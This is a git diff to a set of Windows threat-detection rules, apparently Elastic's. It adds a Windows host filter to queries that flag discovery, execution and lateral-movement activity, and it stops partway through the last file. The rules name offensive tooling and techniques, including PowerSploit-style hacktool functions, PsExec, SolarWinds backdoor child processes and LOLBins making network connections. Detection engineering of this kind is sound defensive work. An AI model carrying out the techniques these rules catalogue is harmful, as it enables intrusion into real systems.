@@ -4,7 +4,7 @@ integration = ["windows", "endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name: "gpresult.exe" or process.pe.original_file_name == "gprslt.exe") and process.args: ("/z", "/v", "/r", "/x") ''' diff --git a/rules/windows/discovery_net_view.toml b/rules/windows/discovery_net_view.toml index bd595800b..6788ad3ea 100644 --- a/rules/windows/discovery_net_view.toml +++ b/rules/windows/discovery_net_view.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,7 +54,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and not process.parent.name : "net.exe")) and diff --git a/rules/windows/discovery_peripheral_device.toml b/rules/windows/discovery_peripheral_device.toml index e3f4788cf..14a2fa4a8 100644 --- a/rules/windows/discovery_peripheral_device.toml +++ b/rules/windows/discovery_peripheral_device.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -58,7 +58,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "fsutil.exe" or process.pe.original_file_name == "fsutil.exe") and process.args : "fsinfo" and process.args : "drives" ''' diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml index e3e3a60f6..b97968d0d 100644 --- a/rules/windows/discovery_posh_invoke_sharefinder.toml +++ b/rules/windows/discovery_posh_invoke_sharefinder.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -82,7 +82,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text:( "Invoke-ShareFinder" or "Invoke-ShareFinderThreaded" or diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index f22861863..cc2a30ede 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/17" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( NetShareEnum or NetWkstaUserEnum or diff --git a/rules/windows/discovery_post_exploitation_external_ip_lookup.toml b/rules/windows/discovery_post_exploitation_external_ip_lookup.toml index 7ec2f620c..782fdf285 100644 --- a/rules/windows/discovery_post_exploitation_external_ip_lookup.toml +++ b/rules/windows/discovery_post_exploitation_external_ip_lookup.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -network where network.protocol == "dns" and +network where host.os.type == "windows" and network.protocol == "dns" and process.name != null and user.id not in ("S-1-5-19", "S-1-5-20") and event.action == "lookup_requested" and /* Add new external IP lookup services here */ diff --git a/rules/windows/discovery_privileged_localgroup_membership.toml b/rules/windows/discovery_privileged_localgroup_membership.toml index d398c66d1..c8bde3608 100644 --- a/rules/windows/discovery_privileged_localgroup_membership.toml +++ b/rules/windows/discovery_privileged_localgroup_membership.toml @@ -91,7 +91,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "user-member-enumerated" and +iam where host.os.type == "windows" and event.action == "user-member-enumerated" and /* excluding machine account */ not winlog.event_data.SubjectUserName: ("*$", "LOCAL SERVICE", "NETWORK SERVICE") and diff --git a/rules/windows/discovery_remote_system_discovery_commands_windows.toml b/rules/windows/discovery_remote_system_discovery_commands_windows.toml index ebff2bfec..fd194fef5 100644 --- a/rules/windows/discovery_remote_system_discovery_commands_windows.toml +++ b/rules/windows/discovery_remote_system_discovery_commands_windows.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,7 +54,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ((process.name : "nbtstat.exe" and process.args : ("-n", "-s")) or (process.name : "arp.exe" and process.args : "-a") or (process.name : "nltest.exe" and process.args : ("/dclist", "/dsgetdc")) or diff --git a/rules/windows/discovery_security_software_wmic.toml b/rules/windows/discovery_security_software_wmic.toml index 230e98c62..f7d781a01 100644 --- a/rules/windows/discovery_security_software_wmic.toml +++ b/rules/windows/discovery_security_software_wmic.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -57,7 +57,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name:"wmic.exe" or process.pe.original_file_name:"wmic.exe") and process.args:"/namespace:\\\\root\\SecurityCenter2" and process.args:"Get" ''' diff --git a/rules/windows/discovery_system_service_discovery.toml b/rules/windows/discovery_system_service_discovery.toml index 2ae88364c..83a45eb7e 100644 --- a/rules/windows/discovery_system_service_discovery.toml +++ b/rules/windows/discovery_system_service_discovery.toml @@ -4,7 +4,7 @@ integration = ["windows", "endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/24" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( ((process.name: "net.exe" or process.pe.original_file_name == "net.exe" or (process.name : "net1.exe" and not process.parent.name : "net.exe")) and process.args : ("start", "use") and process.args_count == 2) or ((process.name: "sc.exe" or process.pe.original_file_name == "sc.exe") and process.args: ("query", "q*")) or diff --git a/rules/windows/discovery_system_time_discovery.toml b/rules/windows/discovery_system_time_discovery.toml index 489d5f95a..7f29c8c8e 100644 --- a/rules/windows/discovery_system_time_discovery.toml +++ b/rules/windows/discovery_system_time_discovery.toml @@ -4,7 +4,7 @@ integration = ["windows", "endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/17" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -24,7 +24,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( ((process.name: "net.exe" or (process.name : "net1.exe" and not process.parent.name : "net.exe")) and process.args : "time") or (process.name: "w32tm.exe" and process.args: "/tz") or diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 8f4b320fb..f0f6d49fd 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.name : "whoami.exe" and +process where host.os.type == "windows" and event.type == "start" and process.name : "whoami.exe" and ( (/* scoped for whoami execution under system privileges */ diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml index ae1ecc902..78d7aa6c2 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and +process where host.os.type == "windows" and event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and process.parent.name: ( "ConfigurationWizard*.exe", "NetflowDatabaseMaintenance*.exe", diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml index aab56638a..c42fa79f9 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name: ("SolarWinds.BusinessLayerHost.exe", "SolarWinds.BusinessLayerHostx64.exe") and not process.name : ( "APMServiceControl*.exe", diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index 51542a324..659916fb2 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name : "xwizard.exe" and ( (process.args : "RunWizard" and process.args : "{*}") or diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index 917e55dbc..479f4d304 100644 --- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,8 +32,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "cmd.exe" and event.type == "start"] - [network where process.name : "cmd.exe" and + [process where host.os.type == "windows" and process.name : "cmd.exe" and event.type == "start"] + [network where host.os.type == "windows" and process.name : "cmd.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 8a7ec65fa..5f15f904b 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -81,7 +81,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "svchost.exe" and process.name : "cmd.exe" and diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml index 50a8ef2c6..c8a5bb5b9 100644 --- a/rules/windows/execution_command_shell_started_by_unusual_process.toml +++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "cmd.exe" and process.parent.name : ("lsass.exe", "csrss.exe", diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml index fd3816413..6d805c059 100644 --- a/rules/windows/execution_command_shell_via_rundll32.toml +++ b/rules/windows/execution_command_shell_via_rundll32.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/07" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("cmd.exe", "powershell.exe") and process.parent.name : "rundll32.exe" and process.parent.command_line != null and /* common FPs can be added here */ diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml index 2925d4c1b..77abfdca6 100644 --- a/rules/windows/execution_downloaded_shortcut_files.toml +++ b/rules/windows/execution_downloaded_shortcut_files.toml @@ -3,7 +3,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "development" query_schema_validation = false -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,9 +27,9 @@ query = ''' sequence by process.entity_id with maxspan=2s /* file.extension added to endpoint fields for 7.10 */ - [file where event.type == "creation" and file.extension == "lnk"] + [file where host.os.type == "windows" and event.type == "creation" and file.extension == "lnk"] /* not sure yet how the update will capture ADS */ - [file where event.type == "creation" and file.extension == "lnk:Zone.Identifier" and + [file where host.os.type == "windows" and event.type == "creation" and file.extension == "lnk:Zone.Identifier" and /* non-ECS field - may disqualify conversion */ file.Ext.windows.zone_identifier > 1] ''' diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index f075d3571..ecb4e2844 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml @@ -3,7 +3,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "development" query_schema_validation = false -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,9 +26,9 @@ query = ''' /* leaving in development pending `file.Ext.windows.zone_identifier` landing in ECS then endpoint */ sequence by process.entity_id with maxspan=2s - [file where event.type == "creation" and file.extension == "url" and + [file where host.os.type == "windows" and event.type == "creation" and file.extension == "url" and not process.name == "explorer.exe"] - [file where event.type == "creation" and file.extension == "url:Zone.Identifier" and + [file where host.os.type == "windows" and event.type == "creation" and file.extension == "url:Zone.Identifier" and /* non-ECS field - may disqualify conversion */ file.Ext.windows.zone_identifier > 1 and not process.name == "explorer.exe"] ''' diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml index ba386b449..3c304678e 100644 --- a/rules/windows/execution_enumeration_via_wmiprvse.toml +++ b/rules/windows/execution_enumeration_via_wmiprvse.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name: ( "arp.exe", diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index cade8b4ab..22d9fe16e 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -89,7 +89,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("wscript.exe", "cscript.exe", "rundll32.exe", diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 2bf108d6d..dc918ac1c 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "hh.exe" and event.type == "start"] - [network where process.name : "hh.exe" and + [process where host.os.type == "windows" and process.name : "hh.exe" and event.type == "start"] + [network where host.os.type == "windows" and process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 5abfc6cbc..5fad22a35 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -73,7 +73,7 @@ type = "eql" query = ''' sequence with maxspan=2h - [file where event.type != "deletion" and file.extension : "exe" and + [file where host.os.type == "windows" and event.type != "deletion" and file.extension : "exe" and (process.name : "WINWORD.EXE" or process.name : "EXCEL.EXE" or process.name : "OUTLOOK.EXE" or @@ -83,7 +83,7 @@ sequence with maxspan=2h process.name : "MSPUB.EXE" or process.name : "MSACCESS.EXE") ] by host.id, file.path - [process where event.type == "start"] by host.id, process.executable + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ''' diff --git a/rules/windows/execution_pdf_written_file.toml b/rules/windows/execution_pdf_written_file.toml index 3b036ce51..4684ea4f4 100644 --- a/rules/windows/execution_pdf_written_file.toml +++ b/rules/windows/execution_pdf_written_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -73,7 +73,7 @@ type = "eql" query = ''' sequence with maxspan=2h - [file where event.type != "deletion" and file.extension : "exe" and + [file where host.os.type == "windows" and event.type != "deletion" and file.extension : "exe" and (process.name : "AcroRd32.exe" or process.name : "rdrcef.exe" or process.name : "FoxitPhantomPDF.exe" or @@ -85,7 +85,7 @@ sequence with maxspan=2h file.name : "AcroRd32.exe" or file.name : "rdrcef.exe") ] by host.id, file.path - [process where event.type == "start"] by host.id, process.executable + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ''' diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 9c8c16c89..caa60f503 100644 --- a/rules/windows/execution_posh_hacktool_functions.toml +++ b/rules/windows/execution_posh_hacktool_functions.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2023/01/17" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -47,7 +47,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( "Add-DomainGroupMember" or "Add-DomainObjectAcl" or "Add-RemoteConnection" or "Add-ServiceDacl" or diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index 17640f4f4..27b88113b 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -104,7 +104,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( TVqQAAMAAAAEAAAA ) and not user.id : "S-1-5-18" diff --git a/rules/windows/execution_posh_psreflect.toml b/rules/windows/execution_posh_psreflect.toml index 8031158e3..68e559f51 100644 --- a/rules/windows/execution_posh_psreflect.toml +++ b/rules/windows/execution_posh_psreflect.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -115,7 +115,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text:( "New-InMemoryModule" or "Add-Win32Type" or diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml index f849d9e7a..556d2c907 100644 --- a/rules/windows/execution_psexec_lateral_movement_command.toml +++ b/rules/windows/execution_psexec_lateral_movement_command.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -63,7 +63,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "PsExec.exe" and event.type == "start" and + [process where host.os.type == "windows" and process.name : "PsExec.exe" and event.type == "start" and /* This flag suppresses the display of the license dialog and may indicate that psexec executed for the first time in the machine */ @@ -74,7 +74,7 @@ sequence by process.entity_id "?:\\Program Files\\Docusnap X\\Bin\\psexec.exe", "?:\\Program Files\\Docusnap X\\Tools\\dsDNS.exe") and not process.parent.executable : "?:\\Program Files (x86)\\Cynet\\Cynet Scanner\\CynetScanner.exe"] - [network where process.name : "PsExec.exe"] + [network where host.os.type == "windows" and process.name : "PsExec.exe"] ''' diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml index b666d5cb8..8a35a43b1 100644 --- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,14 +32,14 @@ type = "eql" query = ''' sequence by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and not ( (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and (process.parent.name : "msiexec.exe" or process.parent.executable : ("C:\\Program Files (x86)\\*.exe", "C:\\Program Files\\*.exe")) ) ] - [network where process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and + [network where host.os.type == "windows" and process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index 5d56671c8..305863e33 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,9 +29,9 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan = 5s - [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")] - [network where process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")] + [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")] ''' diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index 37d3f89d1..160dbc7b2 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where file.extension : "dll" and file.path : "C:\\*\\*.exe.local\\*.dll" +file where host.os.type == "windows" and file.extension : "dll" and file.path : "C:\\*\\*.exe.local\\*.dll" ''' diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index d1bdb9264..4a87ad68a 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and process.name : "cmd.exe" and process.args : "\\\\127.0.0.1\\*" and process.args : ("2>&1", "1>") ''' diff --git a/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml b/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml index c0010f8ff..cf0f11283 100644 --- a/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml +++ b/rules/windows/execution_suspicious_image_load_wmi_ms_office.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where +any where host.os.type == "windows" and (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll") diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index f7fb2577f..28b0eaefa 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = 